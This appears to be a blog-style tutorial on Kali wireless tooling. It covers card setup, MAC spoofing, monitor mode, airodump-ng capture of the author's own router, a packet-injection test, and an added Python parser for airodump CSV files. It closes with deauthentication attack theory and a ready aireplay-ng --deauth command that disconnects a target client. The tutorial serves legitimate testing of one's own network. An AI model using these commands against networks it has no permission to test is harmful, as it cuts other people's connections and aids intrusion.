As in the previous post, I am using an RTL8812AU card; this card has been supported since Kali 2017.1 and is, I think, a pretty great little card.
#power on the wireless card's radio
iwconfig wlan0 txpower on
#list the wireless network SSIDs in range
iwlist wlan0 scan
#connect to a network
iwconfig wlan0 essid "YOURESSID" key "YOURPASSWORD"
#show the card's parameters
iwconfig wlan0
#bring the card up or down (iwconfig has no up/down; that is ifconfig)
ifconfig wlan0 up
ifconfig wlan0 down
#obtain an address via DHCP
dhclient wlan0
#ubuntu/kali: static IP address configuration for the wireless card (/etc/network/interfaces format)
#---------------------------------------
auto lo
iface lo inet loopback
auto eth0
iface eth0 inet static
address 192.168.1.11
netmask 255.255.255.0
auto wlan0
iface wlan0 inet static
address 192.168.0.104
netmask 255.255.255.0
gateway 192.168.0.1
#pre-up ip link set wlan0 up
#pre-up iwconfig wlan0 essid ssid
wpa-ssid 18102XX #SSID
wpa-psk PASSWORD #PASSWORD
#----------------------------------------------
#the iwconfig command shows or configures the wireless card's parameters
iwconfig
ifconfig wlan1 down
#change mac address
macchanger --help
macchanger -s [--show]
macchanger --random wlan1
ifconfig wlan1 up
#monitor mode via airmon-ng; this did not work for me with my RTL8812AU.
airmon-ng start wlan1
airmon-ng stop mon0
#config monitor mode manually
ifconfig wlan1 down
iwconfig wlan1 mode monitor
ifconfig wlan1 up
#check the monitor mode
iwconfig
#kill wpa_supplicant
airmon-ng check kill
#start sniffing on the wireless LAN; the columns in the output are:
airodump-ng wlan1
BSSID: AP MAC address.
PWR: signal power (indicates distance).
Beacons: beacon frames sent by the router.
Data: useful data packets sniffed.
#/s:
CH: channel number.
MB:
ENC: encryption.
CIPHER: cracking method.
AUTH: authentication; PSK = pre-shared key.
ESSID: AP SSID.
#write to a file, then use wireshark to analyze it.
airodump-ng --channel [channel] --bssid [bssid] --write [file-name] [interface]
e.g.:
airodump-ng --channel 6 --bssid 11:22:33:44:55:66 --write out mon0
#Test wireless Device Packet Injection
aireplay-ng -9 -e 18102XX -a 14:D6:XX:XX:XX:XX wlan1
#my output is below
wlan1 is on channel 7, but the AP uses channel 2
#or, if you get "No such BSSID available.", change the channel wlan1 listens on
iwconfig wlan1 channel 2
iwlist wlan1 channel
#run it again; the 100% below means the injection test succeeded
aireplay-ng -9 -e 18102XX -a 14:D6:XX:XX:XX:XX wlan1
18:47:18 Ping (min/avg/max): 2.335ms/3.755ms/10.565ms Power: -40.13
18:47:18 30/30: 100%
#dump my own router; this creates 4 files.
airodump-ng --channel 2 --bssid 14:D6:XX:XX:XX:XX --write out wlan1
STATION: the MAC addresses listed under STATION are all clients.
#ls out*
out-01.cap out-01.csv out-01.kismet.csv out-01.kismet.netxml
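As an added example (not from the original post), a small Python parser for the out-01.csv file that airodump-ng --write produces, building an inventory of which clients are associated with which AP and which stations are unassociated but probing for it, which is how you check who is on your own network before and after a test. The CSV sample inside it is constructed with placeholder MACs; its layout follows airodump-ng's CSV output (AP block, blank line, station block).

```python
# Added example (not from the original post): parse out-01.csv from `airodump-ng --write out`
# and build an AP -> client inventory. The sample below is constructed (placeholder MACs).
import csv
import io

SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
14:D6:AA:BB:CC:DD, 2017-06-01 18:47:18, 2017-06-01 18:50:01,  2,  54, WPA2, CCMP, PSK, -40,      120,        3,   0.  0.  0.  0,   7, 18102XX,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:1E:11:22:33:44, 2017-06-01 18:47:20, 2017-06-01 18:50:00, -52,       45, 14:D6:AA:BB:CC:DD, 18102XX
00:1E:55:66:77:88, 2017-06-01 18:48:02, 2017-06-01 18:49:10, -71,        3, (not associated), 18102XX,CoffeeShop
"""


def parse_airodump_csv(text):
    """Return (aps, stations): aps maps BSSID -> channel/privacy/cipher/essid,
    stations is a list of dicts with mac, bssid and probed ESSIDs."""
    aps, stations, section = {}, [], None
    for row in csv.reader(io.StringIO(text), skipinitialspace=True):
        if not row or not any(cell.strip() for cell in row):
            continue  # blank separator line between the AP and station blocks
        head = row[0].strip()
        if head == "BSSID":
            section = "ap"
        elif head == "Station MAC":
            section = "sta"
        elif section == "ap":
            aps[head] = {"channel": int(row[3]), "privacy": row[5],
                         "cipher": row[6], "essid": row[13]}
        elif section == "sta":
            # probed ESSIDs are comma separated, so they spill into extra columns
            stations.append({"mac": head, "bssid": row[5],
                             "probed": [p for p in row[6:] if p]})
    return aps, stations


def client_inventory(aps, stations):
    """Group associated clients by AP and list unassociated stations probing for a
    captured ESSID (a client just knocked off, or one still trying to join)."""
    essids = {ap["essid"] for ap in aps.values()}
    by_ap = {bssid: [] for bssid in aps}
    probing = []
    for s in stations:
        if s["bssid"] in by_ap:
            by_ap[s["bssid"]].append(s["mac"])
        elif s["bssid"] == "(not associated)" and essids & set(s["probed"]):
            probing.append(s["mac"])
    return by_ap, probing
```

To use it on a real capture, read out-01.csv into a string and pass it to parse_airodump_csv, then feed the result to client_inventory.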
#Deauthentication Attacks Theory
This attack is used to disconnect any device from any network within our range, even
if the network is protected with a key.
The hacker sends deauthentication packets to the router pretending to be the target
machine (by spoofing its MAC address).
At the same time, the hacker sends packets to the target machine (pretending to be the router)
telling it that it needs to re-authenticate.
#First get the clients connected to it
airodump-ng --channel 2 --bssid 14:D6:XX:XX:XX:XX wlan1
#Deauthentication attack: the machine whose MAC address is given with -c "00:1E:XX:XX:XX:XX" will be unable to stay connected.
aireplay-ng --deauth [number of deauth packets] -a [AP-MAC] -c [target-MAC] [interface]
aireplay-ng --deauth 100 -a "14:D6:XX:XX:XX:XX" -c "00:1E:XX:XX:XX:XX" wlan1